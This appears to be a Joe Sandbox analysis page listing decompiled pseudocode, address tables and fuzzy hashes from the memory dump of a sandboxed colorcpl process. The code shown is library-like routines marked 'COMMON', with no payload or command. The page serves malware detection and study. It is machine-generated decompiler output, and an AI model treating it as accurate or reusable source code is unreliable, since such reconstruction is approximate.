0x044082ff
0x04408313
0x00000000
0x04408319
0x0440831c
0x04408323
0x04408328
0x04408328
0x04408313
0x044082f1
0x044082c4
0x0440825d
0x0440825d
0x04408260
0x04408265
0x00000000
0x04408267
0x04408272
0x0440827c
0x00000000
0x0440827e
0x0440827e
0x00000000
0x0440827e
0x0440827c
0x04408265
0x04408222
0x04408222
0x04408222
0x04408225
0x04408225
0x04408228
0x0440822a
0x0440822a
0x0440822a
0x04408234
0x0440832f
0x0440823a
0x04408243
0x04408243
0x04408337
0x04408352
0x04408352
0x0440835d

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
Instruction ID: f125abe35f1a87bc751c33282279b31f2f07f5f33798644f9d991a44029e4233
Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
Instruction Fuzzy Hash: 86419571B00115ABDF14EF99CA81AAFB7BAAF88704F15847EE905A7381DA70ED11C750

Uniqueness

Uniqueness Score: -1.00%

Function 043407A7 Relevance: .1, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E043407A7(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t43;
				intOrPtr* _t48;
				intOrPtr _t49;
				char* _t54;
				intOrPtr _t57;
				void* _t67;
				void* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t74;
				signed char _t79;
				intOrPtr* _t80;
				intOrPtr* _t82;
				void* _t86;
				intOrPtr _t89;

				_t43 =  *0x443664c; // 0x271ccf0
				_push(0);
				_t86 = __edx;
				_t89 = __ecx;
				L04352330(_t43 + 4, _t43 + 4);
				_t1 = _t89 + 0x28; // 0x28
				L04352330(_t1, _t1);
				_t2 = _t89 + 0x2c; // 0x2c
				_t82 = _t2;
				_t73 =  *((intOrPtr*)(_t82 + 4));
				_t48 = _t86 + 4;
				if( *_t73 != _t82) {
					_t74 = 3;
					asm("int 0x29");
					L24:
					_t49 =  *((intOrPtr*)(_t74 + 0x18));
					L22:
					_t74 =  *_t74;
					L20:
					if(_t74 == _t82) {
						L11:
						 *((intOrPtr*)(_t89 + 0x18)) = _t49;
						_push( &_v12);
						_push(0);
						_t25 = _t89 + 0x10; // 0x10
						_push(_t49);
						_t69 = E04384550();
						if(_t69 >= 0) {
							 *((intOrPtr*)(_t89 + 8)) = _v12;
							 *((intOrPtr*)(_t89 + 0xc)) = _v8;
						}
						if(E04353C40() != 0) {
							_t54 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
						} else {
							_t54 = 0x7ffe038e;
						}
						if( *_t54 != 0) {
							if(_t69 >= 0) {
								E043CC5FC(_t86, _t89,  *((intOrPtr*)(_t89 + 0x50)),  *((intOrPtr*)(_t86 + 0x10)),  *(_t86 + 0x24),  *((intOrPtr*)(_t89 + 0x10)),  *((intOrPtr*)(_t89 + 0x14)));
							}
						}
						_t30 = _t89 + 0x28; // 0x28
						E043524D0(_t30);
						_t57 =  *0x443664c; // 0x271ccf0
						E043524D0(_t57 + 4);
						return _t69;
					}
					if(_t49 >  *((intOrPtr*)(_t74 + 0x18))) {
						goto L24;
					}
					goto L22;
				}
				 *_t48 = _t82;
				 *((intOrPtr*)(_t48 + 4)) = _t73;
				 *_t73 = _t48;
				 *((intOrPtr*)(_t82 + 4)) = _t48;
				 *((intOrPtr*)(_t86 + 0xc)) = _t89;
				if( *((intOrPtr*)(_t89 + 0x5c)) == 1) {
					if(( *(_t86 + 0x24) & 0xffffffee) != 0) {
						 *((intOrPtr*)(_t86 + 0x64)) = 1;
					}
				}
				_t79 = 0;
				_t9 = _t89 + 0x3c; // 0x3c
				_t71 = _t9;
				goto L3;
				do {
					L6:
					if( *_t80 != 0) {
						asm("bts ebx, eax");
					}
					_t67 = _t67 + 1;
					_t80 = _t80 + 4;
				} while (_t67 < 5);
				 *((intOrPtr*)(_t89 + 0x34)) =  *((intOrPtr*)(_t89 + 0x34)) + 1;
				if(( *(_t86 + 0x20) & 0x00000004) != 0) {
					 *((intOrPtr*)(_t89 + 0x38)) =  *((intOrPtr*)(_t89 + 0x38)) + 1;
				}
				_t49 =  *((intOrPtr*)(_t86 + 0x1c));
				if( *((intOrPtr*)(_t89 + 0x18)) < _t49) {
					_t74 =  *_t82;
					goto L20;
				} else {
					goto L11;
				}
				L3:
				if(( *(_t86 + 0x24) & 1 << _t79) != 0) {
					 *_t71 =  *_t71 + 1;
				}
				_t79 = _t79 + 1;
				_t71 = _t71 + 4;
				if(_t79 < 5) {
					goto L3;
				} else {
					_t13 = _t89 + 0x3c; // 0x3c
					_t80 = _t13;
					_t67 = 0;
					goto L6;
				}
			}

0x043407af
0x043407ba
0x043407be
0x043407c0
0x043407c2
0x043407c7
0x043407cb
0x043407d0
0x043407d0
0x043407d3
0x043407d6
0x043407db
0x043408c5
0x043408c6
0x043408c8
0x043408c8
0x043408bf
0x043408bf
0x043408b6
0x043408b8
0x04340843
0x04340847
0x0434084a
0x0434084b
0x0434084c
0x0434084f
0x04340856
0x0434085a
0x04340860
0x04340867
0x04340867
0x04340871
0x0439ea96
0x04340877
0x04340877
0x04340877
0x0434087f
0x0439eaa2
0x0439eabb
0x0439eabb
0x0439eaa2
0x04340885
0x04340889
0x0434088e
0x04340897
0x043408a4
0x043408a4
0x043408bd
0x00000000
0x00000000
0x00000000
0x043408bd
0x043407e1
0x043407e3
0x043407e6
0x043407e8
0x043407ee
0x043407f4
0x0439ea7f
0x0439ea85
0x0439ea85
0x0439ea7f
0x043407fa
0x043407fc
0x043407fc
0x043407fc
0x0434081d
0x0434081d
0x04340820
0x043408ac
0x043408ac
0x04340826
0x04340827
0x0434082a
0x0434082f
0x04340836
0x04340838
0x04340838
0x0434083b
0x04340841
0x043408b4
0x00000000
0x00000000
0x00000000
0x00000000
0x043407ff
0x04340807
0x043408a5
0x043408a5
0x0434080d
0x0434080e
0x04340814
0x00000000
0x04340816
0x04340818
0x04340818
0x0434081b
0x00000000
0x0434081b

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c43b8c843e88c4a28891342d89987cebed2c895e200ab9ed8204ddc3864c1e6
Instruction ID: 5ea151445034f7b4151077c6abfcdc86b2f08da90b2f6f46adcdaf0f667f2a0d
Opcode Fuzzy Hash: 1c43b8c843e88c4a28891342d89987cebed2c895e200ab9ed8204ddc3864c1e6
Instruction Fuzzy Hash: 0B418F717007019FD728DF28C580A66B7F9FF88324B10696DDA5687A60E730F855CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0436D600 Relevance: .1, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E0436D600(signed int __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v16;
				intOrPtr _v144;
				signed int _v176;
				signed int _v180;
				char _v188;
				signed int _v192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t35;
				signed char _t36;
				void* _t44;
				void* _t49;
				signed int _t57;
				void* _t64;
				signed int _t66;
				signed int _t69;
				intOrPtr _t72;
				signed char _t77;
				void* _t79;
				signed int _t82;
				intOrPtr _t83;
				void* _t84;
				signed int _t85;
				signed int _t87;
				signed int _t88;

				_t74 = __edx;
				_t87 = (_t85 & 0xfffffff8) - 0xbc;
				_v8 =  *0x443b370 ^ _t87;
				_t88 =  *0x44341d4; // 0x0
				if(_t88 != 0) {
					E04388F40( &_v188, 0, 0xb0);
					_t87 = _t87 + 0xc;
					_v188 = 0xb0;
					_t82 = 0;
					_v144 = 0x20000;
					do {
						_t66 = _t82 & 0xffff7fff;
						_v192 = _t66;
						__eflags =  *0x44341d4; // 0x0
						if(__eflags == 0) {
							goto L13;
						}
						__eflags = _t66 - 0x40;
						if(_t66 < 0x40) {
							L8:
							asm("lock inc dword [eax]");
							_t35 =  *0x44341d4; // 0x0
							_t36 =  *(_t35 + _t66 * 8);
							__eflags = _t36 & 0x00000001;
							if((_t36 & 0x00000001) == 0) {
								_t77 = _t36;
								__eflags = 0;
								if(0 == 0) {
									_t74 =  *(_t77 + 0xd4);
									_t72 =  *((intOrPtr*)(_t77 + 0x14));
									asm("lock dec dword [eax+ecx*8+0x4]");
									__eflags = _t74 & 0x00000400;
									if((_t74 & 0x00000400) == 0) {
										_v180 = _t82;
										_v176 = 0;
										E0437D883(_t72,  &_v188);
									}
								}
							} else {
								asm("lock dec dword [eax+ecx*8+0x4]");
							}
							goto L13;
						}
						_t74 =  &_v192;
						_t57 = E04411712(_t82,  &_v192);
						__eflags = _t57;
						if(_t57 == 0) {
							_t66 = _v192;
							goto L8;
						}
						L13:
						_t82 = _t82 + 1;
						__eflags = _t82 - 0x40;
					} while (_t82 < 0x40);
				}
				_t69 = ( *( *[fs:0x18] + 0xfca) & 0x0000ffff) >> 0x0000000c & 0x00000001;
				E043619DF(_t69);
				E04362755(_t74);
				E0434FED0(0x4435b40);
				E0436DAC0(_t69,  *((intOrPtr*)( *[fs:0x30] + 0x18)));
				_t83 = _a4;
				_push(_t83);
				_push(0);
				_t44 = E04382C70();
				_t89 = _t44;
				if(_t44 < 0) {
					E0436DA20(_t69,  *((intOrPtr*)( *[fs:0x30] + 0x18)));
					_push(0x4435b40);
					E0434E740(_t69);
					_push(_t69);
					_push(0);
					_t74 = 0x12;
					E0436270D(_t74);
					_push(_t83);
					_push(0xfffffffe);
					_t49 = E04382EE0();
				} else {
					E0436D9CE();
					_push(0x4435b40);
					 *0x4435b4c =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					 *0x4435b44 = 0xfffffffe;
					 *0x4435b48 = 1;
					 *0x4435b50 = 0;
					E0434E740(_t69);
					E0436D940(_t69, 0xffffffff, _t83);
					E0436D6D0(0, 0x4435b40, _t83, _t89);
					_push(_t83);
					_push(0xffffffff);
					_t49 = E04382C70();
				}
				_pop(_t79);
				_pop(_t84);
				_pop(_t64);
				return E04384B50(_t49, _t64, _v8 ^ _t87, _t74, _t79, _t84);
			}

0x0436d600
0x0436d608
0x0436d615
0x0436d621
0x0436d627
0x043aefd2
0x043aefdb
0x043aefde
0x043aefe2
0x043aefe4
0x043aefec
0x043aefee
0x043aeff4
0x043aeff8
0x043aeffe
0x00000000
0x00000000
0x043af000
0x043af003
0x043af018
0x043af023
0x043af026
0x043af02b
0x043af02e
0x043af030
0x043af03e
0x043af042
0x043af044
0x043af046
0x043af04c
0x043af054
0x043af059
0x043af05f
0x043af065
0x043af06b
0x043af06f
0x043af06f
0x043af05f
0x043af032
0x043af037
0x043af037
0x00000000
0x043af030
0x043af005
0x043af00b
0x043af010
0x043af012
0x043af014
0x00000000
0x043af014
0x043af074
0x043af074
0x043af075
0x043af075
0x043af07e
0x0436d63d
0x0436d640
0x0436d645
0x0436d650
0x0436d65e
0x0436d663
0x0436d666
0x0436d667
0x0436d668
0x0436d66d
0x0436d66f
0x043af08c
0x043af091
0x043af092
0x043af097
0x043af098
0x043af09b
0x043af09c
0x043af0a1
0x043af0a2
0x043af0a4
0x0436d675
0x0436d675
0x0436d680
0x0436d684
0x0436d689
0x0436d693
0x0436d69d
0x0436d6a3
0x0436d6ab
0x0436d6b0
0x0436d6b5
0x0436d6b6
0x0436d6b8
0x0436d6b8
0x043af0b0
0x043af0b1
0x043af0b2
0x043af0bd

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 158dbab7d91f23c7229fed00e812df5e8aefc16c5415347bbe86ead6a15c00e8
Instruction ID: 11e815f04c6e3a5340c15f92f665e8495d66207b23bbf0783d9f0216192bb958
Opcode Fuzzy Hash: 158dbab7d91f23c7229fed00e812df5e8aefc16c5415347bbe86ead6a15c00e8
Instruction Fuzzy Hash: B341E2B1200611DFE720EF25D880E6BB7E8EF85765F01566DEA1647291DB34FC10DB92

Uniqueness

Uniqueness Score: -1.00%

Function 0437F523 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef9507ec3702048e96b7af7ff71ba16b18be3457726b3e37ec1007bcac0928eb
Instruction ID: c3b2d3a480793701fce731cbf790846b685cdc40cb6431c8fa859e6342cbd9a1
Opcode Fuzzy Hash: ef9507ec3702048e96b7af7ff71ba16b18be3457726b3e37ec1007bcac0928eb
Instruction Fuzzy Hash: 60414B74900648AFEB24DFA9D480AADFBF4FF48714F50956EE495A7201D734A904CF64

Uniqueness

Uniqueness Score: -1.00%

Function 04370630 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
Instruction ID: 89e860bfd1972b7d8ac324bea9b4fc2875a1028a42251d55476582bd9acc771e
Opcode Fuzzy Hash: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
Instruction Fuzzy Hash: E0411671A00605EFDB28CF98C9D0AAAB7F8FF48704B10596DE596E7690E734BA44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0440D7A7 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3330f2aad1c1e020c71f713e1ae4f974cede2f21922303eb10eb12930d1c2be
Instruction ID: 36c41923436b62b599ae01c88b5ed32d66b6da6c6f4a63dfe1066f9694343ecc
Opcode Fuzzy Hash: d3330f2aad1c1e020c71f713e1ae4f974cede2f21922303eb10eb12930d1c2be
Instruction Fuzzy Hash: A141D3B2A047018BEB259FA9C884B2BB7E5EFC4714F04853EE85687391DA34E869C651

Uniqueness

Uniqueness Score: -1.00%

Function 0434254C Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ec4c2b26204ba28e86eb05f4c16398e8282c769d384c3aba7016d52e92a0e85
Instruction ID: edf5abb7ffd3b8300a68f43c2cc4473a8750fb25b5abe42bde6a7b508cafd985
Opcode Fuzzy Hash: 6ec4c2b26204ba28e86eb05f4c16398e8282c769d384c3aba7016d52e92a0e85
Instruction Fuzzy Hash: 2341C470501B00CFEB24DF24D940A9AB7F6FF88398F1191DAE406AB6A0EB74B941CF41

Uniqueness

Uniqueness Score: -1.00%

Function 04371796 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17b90336514c2a4ad0ec915a791829d2fc80b241908a12cb7de3c69547e3f622
Instruction ID: 6cb8e4d47acd6c22018e899843c3ce00db84c860e39cf94313678a662c6b3e5b
Opcode Fuzzy Hash: 17b90336514c2a4ad0ec915a791829d2fc80b241908a12cb7de3c69547e3f622
Instruction Fuzzy Hash: 60418976A00245EFDF19CF58C890BA9BBF1FF48B14F14816AE944AB348D738B940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04344779 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3bbbdc5344ff9fb16e124fbc2c38cff909e4f7ad5910af6b317c90949047e9e
Instruction ID: 3068b3b0f72c8c94cfb0c6abf5dc1b4b35cc1672ae192215f62d549e8bf75f0f
Opcode Fuzzy Hash: e3bbbdc5344ff9fb16e124fbc2c38cff909e4f7ad5910af6b317c90949047e9e
Instruction Fuzzy Hash: 8241E2706003418BE724CF28D894B6ABBE9FFD1764F14543DE941872A1EB32F841CB91

Uniqueness

Uniqueness Score: -1.00%

Function 043501F1 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60217219fab30d7d5fc2cb2f90293db42116593f581b72c7076c745c3ea74110
Instruction ID: 2f9422b841861d86056f3a64dd71fd65d26de2aa03dfc73d87bdb77ad1415c35
Opcode Fuzzy Hash: 60217219fab30d7d5fc2cb2f90293db42116593f581b72c7076c745c3ea74110
Instruction Fuzzy Hash: 17312532A00644ABDB118FA8CC80FDABBF9EF44350F0855A9E855D7362D675B884CB64

Uniqueness

Uniqueness Score: -1.00%

Function 04369194 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 962e6a2335b452597bd6ef90b65b38c92ed4e6028be47c91c7c5e8cd330451e9
Instruction ID: 9a8e76c4e0e244b94d1ff6341b963baccfad0774b8626e20bd5ca8fd82be9269
Opcode Fuzzy Hash: 962e6a2335b452597bd6ef90b65b38c92ed4e6028be47c91c7c5e8cd330451e9
Instruction Fuzzy Hash: 8E3193B2A0062DAFDB319F28CC40F9AB7B9EF86714F1141D9A94DE7248DB30AD448F51

Uniqueness

Uniqueness Score: -1.00%

Function 04345622 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d7a22f29d70d554f328d604ebed2c77c64bdf55f6c1554e9cb9b0ce10d418c5
Instruction ID: ed4a31c0a2a7469c9bdf5b2a54fdce9bac89578027d7b547de3fcfa0f19b76d8
Opcode Fuzzy Hash: 6d7a22f29d70d554f328d604ebed2c77c64bdf55f6c1554e9cb9b0ce10d418c5
Instruction Fuzzy Hash: 73319F31701A12BBEB95AF64CA40A9AB7A9FF84758F046115EA0157A60EB74BC30DB90

Uniqueness

Uniqueness Score: -1.00%

Function 043666E0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
Instruction ID: ea4caa9e78f96460643132d5989af8222f9bfd20a2d62daef125f89c3cf955eb
Opcode Fuzzy Hash: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
Instruction Fuzzy Hash: AD419D72240A46DFD732DF14C940EAEB7A5FF44B54F10A578E8468B6A0DB35F811DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04344180 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22fce7fe8ad6963fe823d84949e21afbec0e7d856e03ac7a27856df696058463
Instruction ID: 1070bd52a4f60244e9ad1d0c76ca7dca991423a6a442a5de26bffc1f5f63fbfc
Opcode Fuzzy Hash: 22fce7fe8ad6963fe823d84949e21afbec0e7d856e03ac7a27856df696058463
Instruction Fuzzy Hash: 65418D31640B45DFE726CF28C484FD6B7E9EF98718F01942AE95A8B660D774F814CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04365004 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
Instruction ID: 3e5c99b362f574a67c425f49b09c58e91e7394ddd03d80ba70a690b941d6fd70
Opcode Fuzzy Hash: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
Instruction Fuzzy Hash: 7A310631708242AFDB20DE289410B66B7E8AB85354F04D53DF8868B299D776F841D7E2

Uniqueness

Uniqueness Score: -1.00%

Function 0433B420 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd1bff4b04cfcffdbe9d5f9bd8f001ee8883763c82100168f204bd77a716b416
Instruction ID: f1422be37d83c3d2683c63350a43a8af2aac99a2ee332ea1aa5d13743e592282
Opcode Fuzzy Hash: bd1bff4b04cfcffdbe9d5f9bd8f001ee8883763c82100168f204bd77a716b416
Instruction Fuzzy Hash: 7B314772600208AFD721DF14C880E6AB7A9FF84765F255269EE458F2A2D731FD42CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 043BE79D Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fddb66dda2ab8b23cedff09ae4796cc9fec43822ff865e7042dd53a15ab25f9f
Instruction ID: 507645cbb9d46353fe67736befa60d9531cbf62d7c1f0a5cc73b72da1c3f8378
Opcode Fuzzy Hash: fddb66dda2ab8b23cedff09ae4796cc9fec43822ff865e7042dd53a15ab25f9f
Instruction Fuzzy Hash: 2131C531741AD09BF326579C894ABD577E8AF41F84F1924B4AFC1DBAE1D728F840C290

Uniqueness

Uniqueness Score: -1.00%

Function 043396E0 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e857e7453da8eb794e347b2d5f6b0a12f7764ab8811018da1966b4eb278d7efe
Instruction ID: 129de07cc004c59e4404719b66884971fc8a2c8ed3addfc1cffc436adda149ca
Opcode Fuzzy Hash: e857e7453da8eb794e347b2d5f6b0a12f7764ab8811018da1966b4eb278d7efe
Instruction Fuzzy Hash: 7021A1B2600A10EFD7219F54C840B1AB7F9EF88B66F165469EA559B290DAB0FD00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 043406CF Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7bcd5da5b1517e4951aa088118ea370afd11fbc19cb4c3087e5de26c7f06ef3
Instruction ID: 866d96ea671f4acaa5a7298f6849c827c3474e9fee22accd161e9ce4f4a5f49e
Opcode Fuzzy Hash: f7bcd5da5b1517e4951aa088118ea370afd11fbc19cb4c3087e5de26c7f06ef3
Instruction Fuzzy Hash: 3231B436704701ABD725DE248880EABBBF9AFC4664F015529FE5597250EB30FC019FA2

Uniqueness

Uniqueness Score: -1.00%

